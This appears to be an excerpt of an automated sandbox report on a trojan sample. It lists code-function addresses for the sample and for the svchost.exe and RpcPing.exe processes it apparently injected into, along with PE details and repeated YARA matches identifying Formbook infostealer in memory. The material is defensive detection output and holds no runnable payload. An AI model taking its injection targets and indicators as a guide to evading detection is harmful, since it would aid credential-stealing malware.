Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Code function: 0_2_00771FD0 0_2_00771FD0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Code function: 0_2_036C3610 0_2_036C3610
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00402850 2_2_00402850
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00410003 2_2_00410003
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0042E823 2_2_0042E823
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00401250 2_2_00401250
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00410223 2_2_00410223
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0040E29C 2_2_0040E29C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0040E2A3 2_2_0040E2A3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00403300 2_2_00403300
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00402440 2_2_00402440
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00416D0E 2_2_00416D0E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00416D13 2_2_00416D13
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004025F1 2_2_004025F1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00402600 2_2_00402600
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C4E3F0 2_2_03C4E3F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03D003E6 2_2_03D003E6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CFA352 2_2_03CFA352
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CC02C0 2_2_03CC02C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CE0274 2_2_03CE0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CF81CC 2_2_03CF81CC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CF41A2 2_2_03CF41A2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03D001AA 2_2_03D001AA
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CC8158 2_2_03CC8158
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C30100 2_2_03C30100
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CDA118 2_2_03CDA118
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CD2000 2_2_03CD2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C3C7C0 2_2_03C3C7C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C64750 2_2_03C64750
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C40770 2_2_03C40770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C5C6E0 2_2_03C5C6E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03D00591 2_2_03D00591
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C40535 2_2_03C40535
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CEE4F6 2_2_03CEE4F6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CF2446 2_2_03CF2446
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CE4420 2_2_03CE4420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CF6BD7 2_2_03CF6BD7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CFAB40 2_2_03CFAB40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C3EA80 2_2_03C3EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C429A0 2_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03D0A9A6 2_2_03D0A9A6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C56962 2_2_03C56962
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C6E8F0 2_2_03C6E8F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C268B8 2_2_03C268B8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C4A840 2_2_03C4A840
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C42840 2_2_03C42840
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C32FC8 2_2_03C32FC8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C4CFE0 2_2_03C4CFE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CBEFA0 2_2_03CBEFA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB4F40 2_2_03CB4F40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C82F28 2_2_03C82F28
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C60F30 2_2_03C60F30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CE2F30 2_2_03CE2F30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CFEEDB 2_2_03CFEEDB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C52E90 2_2_03C52E90
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CFCE93 2_2_03CFCE93
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C40E59 2_2_03C40E59
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CFEE26 2_2_03CFEE26
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C3ADE0 2_2_03C3ADE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C58DBF 2_2_03C58DBF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C4AD00 2_2_03C4AD00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CDCD1F 2_2_03CDCD1F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C30CF2 2_2_03C30CF2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CE0CB5 2_2_03CE0CB5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C40C00 2_2_03C40C00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C8739A 2_2_03C8739A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C2D34C 2_2_03C2D34C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CF132D 2_2_03CF132D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C5B2C0 2_2_03C5B2C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CE12ED 2_2_03CE12ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C452A0 2_2_03C452A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C4B1B0 2_2_03C4B1B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C7516C 2_2_03C7516C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C2F172 2_2_03C2F172
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03D0B16B 2_2_03D0B16B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CEF0CC 2_2_03CEF0CC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C470C0 2_2_03C470C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CF70E9 2_2_03CF70E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CFF0E0 2_2_03CFF0E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CFF7B0 2_2_03CFF7B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CF16CC 2_2_03CF16CC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C85630 2_2_03C85630
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03D095C3 2_2_03D095C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CDD5B0 2_2_03CDD5B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CF7571 2_2_03CF7571
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C31460 2_2_03C31460
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CFF43F 2_2_03CFF43F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB5BF0 2_2_03CB5BF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C7DBF9 2_2_03C7DBF9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C5FB80 2_2_03C5FB80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CFFB76 2_2_03CFFB76
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CEDAC6 2_2_03CEDAC6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CDDAAC 2_2_03CDDAAC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C85AA0 2_2_03C85AA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CE1AA3 2_2_03CE1AA3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CFFA49 2_2_03CFFA49
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CF7A46 2_2_03CF7A46
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB3A6C 2_2_03CB3A6C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C49950 2_2_03C49950
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C5B950 2_2_03C5B950
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CD5910 2_2_03CD5910
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C438E0 2_2_03C438E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CAD800 2_2_03CAD800
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C03FD2 2_2_03C03FD2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C03FD5 2_2_03C03FD5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C41F92 2_2_03C41F92
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CFFFB1 2_2_03CFFFB1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CFFF09 2_2_03CFFF09
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C49EB0 2_2_03C49EB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C5FDC0 2_2_03C5FDC0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C43D40 2_2_03C43D40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CF1D5A 2_2_03CF1D5A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CF7D73 2_2_03CF7D73
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CFFCF2 2_2_03CFFCF2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB9C32 2_2_03CB9C32
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_035AA352 9_2_035AA352
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_035B03E6 9_2_035B03E6
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_034FE3F0 9_2_034FE3F0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_03590274 9_2_03590274
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_035702C0 9_2_035702C0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_03578158 9_2_03578158
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_0358A118 9_2_0358A118
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_034E0100 9_2_034E0100
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_035A81CC 9_2_035A81CC
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_035B01AA 9_2_035B01AA
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_035A41A2 9_2_035A41A2
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_03582000 9_2_03582000
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_03514750 9_2_03514750
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_034F0770 9_2_034F0770
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_034EC7C0 9_2_034EC7C0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_0350C6E0 9_2_0350C6E0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_034F0535 9_2_034F0535
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_035B0591 9_2_035B0591
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_035A2446 9_2_035A2446
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_03594420 9_2_03594420
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_0359E4F6 9_2_0359E4F6
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_035AAB40 9_2_035AAB40
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_035A6BD7 9_2_035A6BD7
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_034EEA80 9_2_034EEA80
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_03506962 9_2_03506962
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_034F29A0 9_2_034F29A0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_035BA9A6 9_2_035BA9A6
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_034F2840 9_2_034F2840
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_034FA840 9_2_034FA840
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_0351E8F0 9_2_0351E8F0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_034D68B8 9_2_034D68B8
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_03564F40 9_2_03564F40
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_03510F30 9_2_03510F30
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_03592F30 9_2_03592F30
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_03532F28 9_2_03532F28
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_034E2FC8 9_2_034E2FC8
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_034FCFE0 9_2_034FCFE0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_0356EFA0 9_2_0356EFA0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_034F0E59 9_2_034F0E59
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_035AEE26 9_2_035AEE26
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_035AEEDB 9_2_035AEEDB
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_03502E90 9_2_03502E90
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_035ACE93 9_2_035ACE93
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_0358CD1F 9_2_0358CD1F
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_034FAD00 9_2_034FAD00
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_034EADE0 9_2_034EADE0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_03508DBF 9_2_03508DBF
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_034F0C00 9_2_034F0C00
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_034E0CF2 9_2_034E0CF2
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_03590CB5 9_2_03590CB5
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_034DD34C 9_2_034DD34C
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_035A132D 9_2_035A132D
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_0353739A 9_2_0353739A
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_0350B2C0 9_2_0350B2C0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_035912ED 9_2_035912ED
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_034F52A0 9_2_034F52A0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_035BB16B 9_2_035BB16B
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_0352516C 9_2_0352516C
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_034DF172 9_2_034DF172
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_034FB1B0 9_2_034FB1B0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_034F70C0 9_2_034F70C0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_0359F0CC 9_2_0359F0CC
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_035A70E9 9_2_035A70E9
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_035AF0E0 9_2_035AF0E0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_035AF7B0 9_2_035AF7B0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_03535630 9_2_03535630
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_035A16CC 9_2_035A16CC
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_035A7571 9_2_035A7571
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_035B95C3 9_2_035B95C3
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_0358D5B0 9_2_0358D5B0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_034E1460 9_2_034E1460
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_035AF43F 9_2_035AF43F
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_035AFB76 9_2_035AFB76
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_03565BF0 9_2_03565BF0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_0352DBF9 9_2_0352DBF9
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_0350FB80 9_2_0350FB80
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_035AFA49 9_2_035AFA49
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_035A7A46 9_2_035A7A46
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_03563A6C 9_2_03563A6C
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_0359DAC6 9_2_0359DAC6
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_03535AA0 9_2_03535AA0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_0358DAAC 9_2_0358DAAC
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_03591AA3 9_2_03591AA3
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_0350B950 9_2_0350B950
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_034F9950 9_2_034F9950
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_03585910 9_2_03585910
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_0355D800 9_2_0355D800
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_034F38E0 9_2_034F38E0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_035AFF09 9_2_035AFF09
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_034B3FD2 9_2_034B3FD2
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_034B3FD5 9_2_034B3FD5
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_034F1F92 9_2_034F1F92
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_035AFFB1 9_2_035AFFB1
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_034F9EB0 9_2_034F9EB0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_035A1D5A 9_2_035A1D5A
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_034F3D40 9_2_034F3D40
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_035A7D73 9_2_035A7D73
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_0350FDC0 9_2_0350FDC0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_03569C32 9_2_03569C32
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_035AFCF2 9_2_035AFCF2
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_02C91B10 9_2_02C91B10
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_02C8CA90 9_2_02C8CA90
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_02C8CCB0 9_2_02C8CCB0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_02C8AD29 9_2_02C8AD29
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_02C8AD30 9_2_02C8AD30
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_02CAB2B0 9_2_02CAB2B0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_02C9379B 9_2_02C9379B
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_02C937A0 9_2_02C937A0
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_0329E3A8 9_2_0329E3A8
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_0329E4C3 9_2_0329E4C3
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_0329E85D 9_2_0329E85D
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 9_2_0329D8C8 9_2_0329D8C8
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03C75130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03C2B970 appears 280 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03C87E54 appears 111 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03CAEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03CBF290 appears 105 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Code function: String function: 00770D27 appears 70 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Code function: String function: 00778B40 appears 42 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Code function: String function: 00757F41 appears 35 times
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: String function: 03537E54 appears 111 times
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: String function: 0356F290 appears 105 times
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: String function: 034DB970 appears 280 times
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: String function: 0355EA12 appears 86 times
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: String function: 03525130 appears 58 times
Source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe, 00000000.00000003.2099822981.0000000003CB3000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe
Source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe, 00000000.00000003.2100662687.0000000003E5D000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe
Source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000A.00000002.3339015758.0000000000FA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.2667649545.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000009.00000002.3339723767.0000000003150000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000009.00000002.3339772912.00000000031A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.2670025660.0000000006E20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000009.00000002.3337846059.0000000002C80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.3339477334.0000000002D90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
